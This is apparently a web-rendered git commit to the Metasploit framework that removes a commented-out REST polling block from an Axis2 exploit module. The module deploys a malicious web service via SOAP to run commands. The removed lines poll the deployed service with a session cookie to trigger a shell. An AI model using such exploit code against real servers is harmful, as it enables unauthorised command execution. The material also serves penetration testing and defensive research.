remove commented out REST portion
git-svn-id: file:///home/svn/framework3/trunk@11179 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
98e8ec4cc9
commit
d5835fe7b0
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit
|
|||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
|
||||
and uploads and executes commands via deploying a malicious web service by using SOAP.
|
||||
and uploads and executes commands via deploying a malicious web service by using SOAP.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
|
@ -203,27 +203,6 @@ class Metasploit3 < Msf::Exploit
|
|||
|
||||
end
|
||||
|
||||
=begin
|
||||
useful for axis2 or REST
|
||||
# Try to execute the payload
|
||||
1.upto 5 do
|
||||
Rex::ThreadSafe.sleep(3)
|
||||
print_status("Polling to see if the service is ready")
|
||||
res = send_request_raw({
|
||||
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Cookie' => "JSESSIONID=#{session}",
|
||||
}
|
||||
}, 25)
|
||||
if res.code >= 200 and res.code < 300
|
||||
# This should usually mean we got a shell
|
||||
break
|
||||
end
|
||||
end
|
||||
=end
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
Loading…
Reference in New Issue